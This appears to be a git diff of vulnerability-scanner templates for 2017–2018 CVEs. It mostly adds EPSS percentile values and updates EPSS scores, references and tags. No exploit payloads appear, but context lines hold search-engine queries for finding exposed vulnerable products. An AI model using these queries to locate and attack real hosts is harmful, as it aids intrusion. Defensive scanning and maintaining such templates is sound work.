diff --git a/http/cves/2017/CVE-2017-14622.yaml b/http/cves/2017/CVE-2017-14622.yaml
index bd35884585..a49ccd3551 100644
--- a/http/cves/2017/CVE-2017-14622.yaml
+++ b/http/cves/2017/CVE-2017-14622.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00135
cpe: cpe:2.3:a:2kblater:2kb_amazon_affiliates_store:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.47979
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2017/CVE-2017-14651.yaml b/http/cves/2017/CVE-2017-14651.yaml
index c72ce37e1e..bbdf00d454 100644
--- a/http/cves/2017/CVE-2017-14651.yaml
+++ b/http/cves/2017/CVE-2017-14651.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00144
cpe: cpe:2.3:a:wso2:api_manager:2.1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.49573
metadata:
max-request: 1
vendor: wso2
diff --git a/http/cves/2017/CVE-2017-14849.yaml b/http/cves/2017/CVE-2017-14849.yaml
index abe5cdef83..f7e453536c 100644
--- a/http/cves/2017/CVE-2017-14849.yaml
+++ b/http/cves/2017/CVE-2017-14849.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.96872
cpe: cpe:2.3:a:nodejs:node.js:8.5.0:*:*:*:*:*:*:*
+ epss-percentile: 0.9957
metadata:
max-request: 1
vendor: nodejs
diff --git a/http/cves/2017/CVE-2017-15287.yaml b/http/cves/2017/CVE-2017-15287.yaml
index 8b73a01a3f..8245e76127 100644
--- a/http/cves/2017/CVE-2017-15287.yaml
+++ b/http/cves/2017/CVE-2017-15287.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00129
cpe: cpe:2.3:a:bouqueteditor_project:bouqueteditor:2.0.0:*:*:*:*:dreambox:*:*
+ epss-percentile: 0.46905
metadata:
max-request: 1
framework: dreambox
diff --git a/http/cves/2017/CVE-2017-15363.yaml b/http/cves/2017/CVE-2017-15363.yaml
index 0e97599956..1033033a9d 100644
--- a/http/cves/2017/CVE-2017-15363.yaml
+++ b/http/cves/2017/CVE-2017-15363.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.04393
cpe: cpe:2.3:a:luracast:restler:*:*:*:*:*:typo3:*:*
+ epss-percentile: 0.91303
metadata:
max-request: 1
framework: typo3
diff --git a/http/cves/2017/CVE-2017-15647.yaml b/http/cves/2017/CVE-2017-15647.yaml
index 5246f9d70c..f1aa56b49b 100644
--- a/http/cves/2017/CVE-2017-15647.yaml
+++ b/http/cves/2017/CVE-2017-15647.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.02013
cpe: cpe:2.3:o:fiberhome:routerfiberhome_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.87436
metadata:
max-request: 1
vendor: fiberhome
diff --git a/http/cves/2017/CVE-2017-15715.yaml b/http/cves/2017/CVE-2017-15715.yaml
index 02b57dcb07..fe64daa1a0 100644
--- a/http/cves/2017/CVE-2017-15715.yaml
+++ b/http/cves/2017/CVE-2017-15715.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 8.1
cve-id: CVE-2017-15715
cwe-id: CWE-20
- epss-score: 0.971
+ epss-score: 0.97053
cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99649
metadata:
max-request: 2
vendor: apache
diff --git a/http/cves/2017/CVE-2017-15944.yaml b/http/cves/2017/CVE-2017-15944.yaml
index f4fa257ff1..4fec82c069 100644
--- a/http/cves/2017/CVE-2017-15944.yaml
+++ b/http/cves/2017/CVE-2017-15944.yaml
@@ -15,8 +15,9 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2017-15944
- epss-score: 0.97414
+ epss-score: 0.97425
cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99895
metadata:
max-request: 1
vendor: paloaltonetworks
diff --git a/http/cves/2017/CVE-2017-16806.yaml b/http/cves/2017/CVE-2017-16806.yaml
index f63a1280fc..3e8ce9ae33 100644
--- a/http/cves/2017/CVE-2017-16806.yaml
+++ b/http/cves/2017/CVE-2017-16806.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.07055
cpe: cpe:2.3:a:ulterius:ulterius_server:1.5.6.0:*:*:*:*:*:*:*
+ epss-percentile: 0.93105
metadata:
max-request: 2
vendor: ulterius
diff --git a/http/cves/2017/CVE-2017-16877.yaml b/http/cves/2017/CVE-2017-16877.yaml
index 7b76625c78..22ba3c00a5 100644
--- a/http/cves/2017/CVE-2017-16877.yaml
+++ b/http/cves/2017/CVE-2017-16877.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.0032
cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:*
+ epss-percentile: 0.66762
metadata:
max-request: 1
vendor: zeit
diff --git a/http/cves/2017/CVE-2017-16894.yaml b/http/cves/2017/CVE-2017-16894.yaml
index 06b374c404..c74d570fad 100644
--- a/http/cves/2017/CVE-2017-16894.yaml
+++ b/http/cves/2017/CVE-2017-16894.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-200
epss-score: 0.29151
cpe: cpe:2.3:a:laravel:laravel:*:*:*:*:*:*:*:*
+ epss-percentile: 0.9629
metadata:
max-request: 1
fofa-query: app="Laravel-Framework"
diff --git a/http/cves/2017/CVE-2017-17043.yaml b/http/cves/2017/CVE-2017-17043.yaml
index 02ebc3cbb6..07c810f05a 100644
--- a/http/cves/2017/CVE-2017-17043.yaml
+++ b/http/cves/2017/CVE-2017-17043.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00245
cpe: cpe:2.3:a:zitec:emag_marketplace_connector:1.0.0:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.6175
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml
index b8e4acc91f..c16eeb27d7 100644
--- a/http/cves/2017/CVE-2017-17059.yaml
+++ b/http/cves/2017/CVE-2017-17059.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00263
cpe: cpe:2.3:a:amtythumb_project:amtythumb:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.63188
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2017/CVE-2017-17451.yaml b/http/cves/2017/CVE-2017-17451.yaml
index 057d68e0cf..2f8b58dff2 100644
--- a/http/cves/2017/CVE-2017-17451.yaml
+++ b/http/cves/2017/CVE-2017-17451.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00178
cpe: cpe:2.3:a:wpmailster:wp_mailster:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.54328
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2017/CVE-2017-17562.yaml b/http/cves/2017/CVE-2017-17562.yaml
index 4c3bd723a2..7434002dcc 100644
--- a/http/cves/2017/CVE-2017-17562.yaml
+++ b/http/cves/2017/CVE-2017-17562.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-20
epss-score: 0.9747
cpe: cpe:2.3:a:embedthis:goahead:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99941
metadata:
max-request: 65
vendor: embedthis
diff --git a/http/cves/2017/CVE-2017-17731.yaml b/http/cves/2017/CVE-2017-17731.yaml
index 7b9bd698ed..c20bef64a3 100644
--- a/http/cves/2017/CVE-2017-17731.yaml
+++ b/http/cves/2017/CVE-2017-17731.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2017-17731
cwe-id: CWE-89
- epss-score: 0.11468
+ epss-score: 0.14043
cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:*
+ epss-percentile: 0.94965
metadata:
fofa-query: app="DedeCMS"
max-request: 1
diff --git a/http/cves/2017/CVE-2017-17736.yaml b/http/cves/2017/CVE-2017-17736.yaml
index ad5249a47a..2101fa0fed 100644
--- a/http/cves/2017/CVE-2017-17736.yaml
+++ b/http/cves/2017/CVE-2017-17736.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-425
epss-score: 0.1483
cpe: cpe:2.3:a:kentico:kentico_cms:*:*:*:*:*:*:*:*
+ epss-percentile: 0.95082
metadata:
max-request: 1
google-query: intitle:"kentico database setup"
diff --git a/http/cves/2017/CVE-2017-18024.yaml b/http/cves/2017/CVE-2017-18024.yaml
index 35031150f7..23e6ac0806 100644
--- a/http/cves/2017/CVE-2017-18024.yaml
+++ b/http/cves/2017/CVE-2017-18024.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00072
cpe: cpe:2.3:a:avantfax:avantfax:3.3.3:*:*:*:*:*:*:*
+ epss-percentile: 0.29644
metadata:
max-request: 1
vendor: avantfax
diff --git a/http/cves/2017/CVE-2017-18536.yaml b/http/cves/2017/CVE-2017-18536.yaml
index 20ee57ef07..0523195af2 100644
--- a/http/cves/2017/CVE-2017-18536.yaml
+++ b/http/cves/2017/CVE-2017-18536.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00088
cpe: cpe:2.3:a:fullworks:stop_user_enumeration:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.36469
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml
index e910d85074..424651e733 100644
--- a/http/cves/2017/CVE-2017-18598.yaml
+++ b/http/cves/2017/CVE-2017-18598.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00094
cpe: cpe:2.3:a:designmodo:qards:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.38904
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2017/CVE-2017-18638.yaml b/http/cves/2017/CVE-2017-18638.yaml
index 0da8ed62b0..ef98b24520 100644
--- a/http/cves/2017/CVE-2017-18638.yaml
+++ b/http/cves/2017/CVE-2017-18638.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-918
epss-score: 0.00902
cpe: cpe:2.3:a:graphite_project:graphite:*:*:*:*:*:*:*:*
+ epss-percentile: 0.80714
metadata:
max-request: 1
vendor: graphite_project
diff --git a/http/cves/2017/CVE-2017-3506.yaml b/http/cves/2017/CVE-2017-3506.yaml
index cf7415ab27..0eb4e3b917 100644
--- a/http/cves/2017/CVE-2017-3506.yaml
+++ b/http/cves/2017/CVE-2017-3506.yaml
@@ -16,6 +16,7 @@ info:
cve-id: CVE-2017-3506
epss-score: 0.96927
cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*
+ epss-percentile: 0.99602
metadata:
max-request: 1
vendor: oracle
diff --git a/http/cves/2017/CVE-2017-3528.yaml b/http/cves/2017/CVE-2017-3528.yaml
index d2a62888f1..f6d90aa5ca 100644
--- a/http/cves/2017/CVE-2017-3528.yaml
+++ b/http/cves/2017/CVE-2017-3528.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-601
epss-score: 0.00865
cpe: cpe:2.3:a:oracle:applications_framework:12.1.3:*:*:*:*:*:*:*
+ epss-percentile: 0.80229
metadata:
max-request: 1
vendor: oracle
diff --git a/http/cves/2017/CVE-2017-4011.yaml b/http/cves/2017/CVE-2017-4011.yaml
index af96fb7c99..9991ecccc0 100644
--- a/http/cves/2017/CVE-2017-4011.yaml
+++ b/http/cves/2017/CVE-2017-4011.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00142
cpe: cpe:2.3:a:mcafee:network_data_loss_prevention:*:*:*:*:*:*:*:*
+ epss-percentile: 0.49337
metadata:
max-request: 1
vendor: mcafee
diff --git a/http/cves/2017/CVE-2017-5487.yaml b/http/cves/2017/CVE-2017-5487.yaml
index a61ad11b07..51d2af5f54 100644
--- a/http/cves/2017/CVE-2017-5487.yaml
+++ b/http/cves/2017/CVE-2017-5487.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2017-5487
cwe-id: CWE-200
- epss-score: 0.97204
+ epss-score: 0.97179
cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99719
metadata:
max-request: 2
shodan-query: http.component:"WordPress"
diff --git a/http/cves/2017/CVE-2017-5521.yaml b/http/cves/2017/CVE-2017-5521.yaml
index e6e5090634..c4ef86a2a9 100644
--- a/http/cves/2017/CVE-2017-5521.yaml
+++ b/http/cves/2017/CVE-2017-5521.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-200
epss-score: 0.97402
cpe: cpe:2.3:o:netgear:r6200_firmware:1.0.1.56_1.0.43:*:*:*:*:*:*:*
+ epss-percentile: 0.99876
metadata:
max-request: 1
vendor: netgear
diff --git a/http/cves/2017/CVE-2017-5631.yaml b/http/cves/2017/CVE-2017-5631.yaml
index 75bc656d40..2b02ed7129 100644
--- a/http/cves/2017/CVE-2017-5631.yaml
+++ b/http/cves/2017/CVE-2017-5631.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00286
cpe: cpe:2.3:a:kmc_information_systems:caseaware:-:*:*:*:*:*:*:*
+ epss-percentile: 0.64713
metadata:
max-request: 1
vendor: kmc_information_systems
diff --git a/http/cves/2017/CVE-2017-5638.yaml b/http/cves/2017/CVE-2017-5638.yaml
index 99477c463d..f63d6b8258 100644
--- a/http/cves/2017/CVE-2017-5638.yaml
+++ b/http/cves/2017/CVE-2017-5638.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-20
epss-score: 0.9756
cpe: cpe:2.3:a:apache:struts:2.3.5:*:*:*:*:*:*:*
+ epss-percentile: 0.99995
metadata:
max-request: 1
shodan-query: html:"Apache Struts"
diff --git a/http/cves/2017/CVE-2017-5689.yaml b/http/cves/2017/CVE-2017-5689.yaml
index bacdfcdaf9..cdd981e82c 100644
--- a/http/cves/2017/CVE-2017-5689.yaml
+++ b/http/cves/2017/CVE-2017-5689.yaml
@@ -16,8 +16,9 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2017-5689
- epss-score: 0.97453
+ epss-score: 0.97416
cpe: cpe:2.3:o:intel:active_management_technology_firmware:6.0:*:*:*:*:*:*:*
+ epss-percentile: 0.99888
metadata:
max-request: 2
shodan-query: title:"Active Management Technology"
diff --git a/http/cves/2017/CVE-2017-5982.yaml b/http/cves/2017/CVE-2017-5982.yaml
index 89a02cb956..15ecad4ae3 100644
--- a/http/cves/2017/CVE-2017-5982.yaml
+++ b/http/cves/2017/CVE-2017-5982.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.0488
cpe: cpe:2.3:a:kodi:kodi:17.1:*:*:*:*:*:*:*
+ epss-percentile: 0.91748
metadata:
max-request: 1
vendor: kodi
diff --git a/http/cves/2017/CVE-2017-6090.yaml b/http/cves/2017/CVE-2017-6090.yaml
index c8ef3c09a9..b0a02af8ad 100644
--- a/http/cves/2017/CVE-2017-6090.yaml
+++ b/http/cves/2017/CVE-2017-6090.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2017-6090
cwe-id: CWE-434
- epss-score: 0.97366
+ epss-score: 0.97282
cpe: cpe:2.3:a:phpcollab:phpcollab:*:*:*:*:*:*:*:*
+ epss-percentile: 0.9978
metadata:
max-request: 2
shodan-query: http.title:"PhpCollab"
diff --git a/http/cves/2017/CVE-2017-7269.yaml b/http/cves/2017/CVE-2017-7269.yaml
index e25d2159ab..b1346c461f 100644
--- a/http/cves/2017/CVE-2017-7269.yaml
+++ b/http/cves/2017/CVE-2017-7269.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-119
epss-score: 0.97156
cpe: cpe:2.3:a:microsoft:internet_information_server:6.0:*:*:*:*:*:*:*
+ epss-percentile: 0.99699
metadata:
max-request: 1
vendor: microsoft
diff --git a/http/cves/2017/CVE-2017-7391.yaml b/http/cves/2017/CVE-2017-7391.yaml
index 2de8d4390d..e2e16e462f 100644
--- a/http/cves/2017/CVE-2017-7391.yaml
+++ b/http/cves/2017/CVE-2017-7391.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00204
cpe: cpe:2.3:a:magmi_project:magmi:0.7.22:*:*:*:*:*:*:*
+ epss-percentile: 0.57588
metadata:
max-request: 1
vendor: magmi_project
diff --git a/http/cves/2017/CVE-2017-7615.yaml b/http/cves/2017/CVE-2017-7615.yaml
index 6961066739..84fee90c08 100644
--- a/http/cves/2017/CVE-2017-7615.yaml
+++ b/http/cves/2017/CVE-2017-7615.yaml
@@ -21,8 +21,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2017-7615
cwe-id: CWE-640
- epss-score: 0.97443
+ epss-score: 0.97404
cpe: cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:*
+ epss-percentile: 0.9988
metadata:
max-request: 5
vendor: mantisbt
diff --git a/http/cves/2017/CVE-2017-7921.yaml b/http/cves/2017/CVE-2017-7921.yaml
index 26ddf1ee87..edd2a1c232 100644
--- a/http/cves/2017/CVE-2017-7921.yaml
+++ b/http/cves/2017/CVE-2017-7921.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-287
epss-score: 0.01169
cpe: cpe:2.3:o:hikvision:ds-2cd2032-i_firmware:-:*:*:*:*:*:*:*
+ epss-percentile: 0.83195
metadata:
max-request: 1
vendor: hikvision
diff --git a/http/cves/2017/CVE-2017-7925.yaml b/http/cves/2017/CVE-2017-7925.yaml
index 6db2015bcd..05cb575b7b 100644
--- a/http/cves/2017/CVE-2017-7925.yaml
+++ b/http/cves/2017/CVE-2017-7925.yaml
@@ -9,13 +9,15 @@ info:
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-7925
- https://ics-cert.us-cert.gov/advisories/ICSA-17-124-02
+ - http://us.dahuasecurity.com/en/us/Security-Bulletin_030617.php
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2017-7925
cwe-id: CWE-522,CWE-260
- epss-score: 0.00583
+ epss-score: 0.35031
cpe: cpe:2.3:o:dahuasecurity:dh-ipc-hdbw23a0rn-zs_firmware:-:*:*:*:*:*:*:*
+ epss-percentile: 0.96568
metadata:
max-request: 1
product: dh-ipc-hdbw23a0rn-zs_firmware
diff --git a/http/cves/2017/CVE-2017-8229.yaml b/http/cves/2017/CVE-2017-8229.yaml
index 89310c05b2..1f0708f67d 100644
--- a/http/cves/2017/CVE-2017-8229.yaml
+++ b/http/cves/2017/CVE-2017-8229.yaml
@@ -10,16 +10,23 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2017-8229
- http://packetstormsecurity.com/files/153224/Amcrest-IPM-721S-Credential-Disclosure-Privilege-Escalation.html
- https://github.com/ethanhunnt/IoT_vulnerabilities/blob/master/Amcrest_sec_issues.pdf
+ - https://seclists.org/bugtraq/2019/Jun/8
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
+ cve-id: CVE-2017-8229
cwe-id: CWE-255
+ epss-score: 0.95016
+ cpe: cpe:2.3:o:amcrest:ipm-721s_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99003
metadata:
max-request: 1
fofa-query: "Amcrest"
shodan-query: html:"Amcrest"
verified: true
- tags: cve,cve2017,amcrest,iot
+ vendor: amcrest
+ product: ipm-721s_firmware
+ tags: packetstorm,cve,cve2017,amcrest,iot
http:
- method: GET
diff --git a/http/cves/2017/CVE-2017-8917.yaml b/http/cves/2017/CVE-2017-8917.yaml
index 9e64a33e8d..79e9d2df63 100644
--- a/http/cves/2017/CVE-2017-8917.yaml
+++ b/http/cves/2017/CVE-2017-8917.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-89
epss-score: 0.97555
cpe: cpe:2.3:a:joomla:joomla\!:3.7.0:*:*:*:*:*:*:*
+ epss-percentile: 0.99994
metadata:
max-request: 1
shodan-query: http.component:"Joomla"
diff --git a/http/cves/2017/CVE-2017-9140.yaml b/http/cves/2017/CVE-2017-9140.yaml
index 0f5a788895..ea43f7b11b 100644
--- a/http/cves/2017/CVE-2017-9140.yaml
+++ b/http/cves/2017/CVE-2017-9140.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-79
epss-score: 0.0021
cpe: cpe:2.3:a:progress:telerik_reporting:*:*:*:*:*:*:*:*
+ epss-percentile: 0.58217
metadata:
max-request: 1
vendor: progress
diff --git a/http/cves/2017/CVE-2017-9288.yaml b/http/cves/2017/CVE-2017-9288.yaml
index ff189cd1b2..fc1c1a1d9a 100644
--- a/http/cves/2017/CVE-2017-9288.yaml
+++ b/http/cves/2017/CVE-2017-9288.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00168
cpe: cpe:2.3:a:raygun:raygun4wp:1.8.0:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.53128
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2017/CVE-2017-9416.yaml b/http/cves/2017/CVE-2017-9416.yaml
index f6d12d424b..063a3fdce0 100644
--- a/http/cves/2017/CVE-2017-9416.yaml
+++ b/http/cves/2017/CVE-2017-9416.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.5
cve-id: CVE-2017-9416
cwe-id: CWE-22
- epss-score: 0.01465
+ epss-score: 0.01037
cpe: cpe:2.3:a:odoo:odoo:8.0:*:*:*:*:*:*:*
+ epss-percentile: 0.82064
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2017/CVE-2017-9506.yaml b/http/cves/2017/CVE-2017-9506.yaml
index d803badb4e..02fd1e6677 100644
--- a/http/cves/2017/CVE-2017-9506.yaml
+++ b/http/cves/2017/CVE-2017-9506.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-918
epss-score: 0.00575
cpe: cpe:2.3:a:atlassian:oauth:1.3.0:*:*:*:*:*:*:*
+ epss-percentile: 0.7516
metadata:
max-request: 1
shodan-query: http.component:"Atlassian Jira"
diff --git a/http/cves/2017/CVE-2017-9791.yaml b/http/cves/2017/CVE-2017-9791.yaml
index 9b9ef09ad2..328dd6c969 100644
--- a/http/cves/2017/CVE-2017-9791.yaml
+++ b/http/cves/2017/CVE-2017-9791.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2017-9791
cwe-id: CWE-20
- epss-score: 0.97502
+ epss-score: 0.97478
cpe: cpe:2.3:a:apache:struts:2.3.1:*:*:*:*:*:*:*
+ epss-percentile: 0.99948
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2017/CVE-2017-9805.yaml b/http/cves/2017/CVE-2017-9805.yaml
index 4805e90355..5b276b967b 100644
--- a/http/cves/2017/CVE-2017-9805.yaml
+++ b/http/cves/2017/CVE-2017-9805.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 8.1
cve-id: CVE-2017-9805
cwe-id: CWE-502
- epss-score: 0.97539
+ epss-score: 0.97548
cpe: cpe:2.3:a:apache:struts:2.1.2:*:*:*:*:*:*:*
+ epss-percentile: 0.99992
metadata:
max-request: 2
vendor: apache
diff --git a/http/cves/2017/CVE-2017-9822.yaml b/http/cves/2017/CVE-2017-9822.yaml
index d002188cf8..e150b72a7e 100644
--- a/http/cves/2017/CVE-2017-9822.yaml
+++ b/http/cves/2017/CVE-2017-9822.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2017-9822
cwe-id: CWE-20
- epss-score: 0.97064
+ epss-score: 0.97106
cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99673
metadata:
max-request: 1
vendor: dnnsoftware
diff --git a/http/cves/2017/CVE-2017-9833.yaml b/http/cves/2017/CVE-2017-9833.yaml
index 4d0755ceba..a0d8679fdf 100644
--- a/http/cves/2017/CVE-2017-9833.yaml
+++ b/http/cves/2017/CVE-2017-9833.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.48044
cpe: cpe:2.3:a:boa:boa:0.94.14.21:*:*:*:*:*:*:*
+ epss-percentile: 0.97006
metadata:
max-request: 1
vendor: boa
diff --git a/http/cves/2017/CVE-2017-9841.yaml b/http/cves/2017/CVE-2017-9841.yaml
index a4e08d936c..96992a6742 100644
--- a/http/cves/2017/CVE-2017-9841.yaml
+++ b/http/cves/2017/CVE-2017-9841.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-94
epss-score: 0.97488
cpe: cpe:2.3:a:phpunit_project:phpunit:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99954
metadata:
max-request: 6
vendor: phpunit_project
diff --git a/http/cves/2018/CVE-2018-0127.yaml b/http/cves/2018/CVE-2018-0127.yaml
index b5e88c3e6a..a9c797b79b 100644
--- a/http/cves/2018/CVE-2018-0127.yaml
+++ b/http/cves/2018/CVE-2018-0127.yaml
@@ -14,9 +14,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-0127
- cwe-id: CWE-306,CWE-200
- epss-score: 0.08908
+ cwe-id: CWE-200,CWE-306
+ epss-score: 0.0948
cpe: cpe:2.3:o:cisco:rv132w_firmware:1.0.0.1:*:*:*:*:*:*:*
+ epss-percentile: 0.93961
metadata:
max-request: 1
vendor: "cisco"
diff --git a/http/cves/2018/CVE-2018-0296.yaml b/http/cves/2018/CVE-2018-0296.yaml
index 58d877cbc5..042c491e3f 100644
--- a/http/cves/2018/CVE-2018-0296.yaml
+++ b/http/cves/2018/CVE-2018-0296.yaml
@@ -16,9 +16,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score: 7.5
cve-id: CVE-2018-0296
- cwe-id: CWE-20,CWE-22
- epss-score: 0.97461
+ cwe-id: CWE-22,CWE-20
+ epss-score: 0.97446
cpe: cpe:2.3:a:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99918
metadata:
max-request: 1
vendor: cisco
diff --git a/http/cves/2018/CVE-2018-1000129.yaml b/http/cves/2018/CVE-2018-1000129.yaml
index 61215e03fd..911308436c 100644
--- a/http/cves/2018/CVE-2018-1000129.yaml
+++ b/http/cves/2018/CVE-2018-1000129.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00232
cpe: cpe:2.3:a:jolokia:jolokia:1.3.7:*:*:*:*:*:*:*
+ epss-percentile: 0.60647
metadata:
max-request: 2
vendor: jolokia
diff --git a/http/cves/2018/CVE-2018-1000130.yaml b/http/cves/2018/CVE-2018-1000130.yaml
index 2bf857215d..a0ff2f9fc8 100644
--- a/http/cves/2018/CVE-2018-1000130.yaml
+++ b/http/cves/2018/CVE-2018-1000130.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 8.1
cve-id: CVE-2018-1000130
cwe-id: CWE-74
- epss-score: 0.90131
+ epss-score: 0.89191
cpe: cpe:2.3:a:jolokia:webarchive_agent:1.3.7:*:*:*:*:*:*:*
+ epss-percentile: 0.98305
metadata:
max-request: 1
vendor: jolokia
diff --git a/http/cves/2018/CVE-2018-1000226.yaml b/http/cves/2018/CVE-2018-1000226.yaml
index bc35701862..5e0e702474 100644
--- a/http/cves/2018/CVE-2018-1000226.yaml
+++ b/http/cves/2018/CVE-2018-1000226.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-732
epss-score: 0.01552
cpe: cpe:2.3:a:cobblerd:cobbler:*:*:*:*:*:*:*:*
+ epss-percentile: 0.85554
metadata:
max-request: 1
vendor: cobblerd
diff --git a/http/cves/2018/CVE-2018-1000533.yaml b/http/cves/2018/CVE-2018-1000533.yaml
index 0999bfcb78..f5c2c4ad7c 100644
--- a/http/cves/2018/CVE-2018-1000533.yaml
+++ b/http/cves/2018/CVE-2018-1000533.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-20
epss-score: 0.97207
cpe: cpe:2.3:a:gitlist:gitlist:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99732
metadata:
max-request: 2
vendor: gitlist
diff --git a/http/cves/2018/CVE-2018-1000600.yaml b/http/cves/2018/CVE-2018-1000600.yaml
index 728b0894ef..de3d9880c8 100644
--- a/http/cves/2018/CVE-2018-1000600.yaml
+++ b/http/cves/2018/CVE-2018-1000600.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-200
epss-score: 0.95579
cpe: cpe:2.3:a:jenkins:github:*:*:*:*:*:jenkins:*:*
+ epss-percentile: 0.99139
metadata:
max-request: 1
framework: jenkins
diff --git a/http/cves/2018/CVE-2018-1000671.yaml b/http/cves/2018/CVE-2018-1000671.yaml
index d87dad94c5..7d221aea66 100644
--- a/http/cves/2018/CVE-2018-1000671.yaml
+++ b/http/cves/2018/CVE-2018-1000671.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-601
epss-score: 0.00831
cpe: cpe:2.3:a:sympa:sympa:*:*:*:*:*:*:*:*
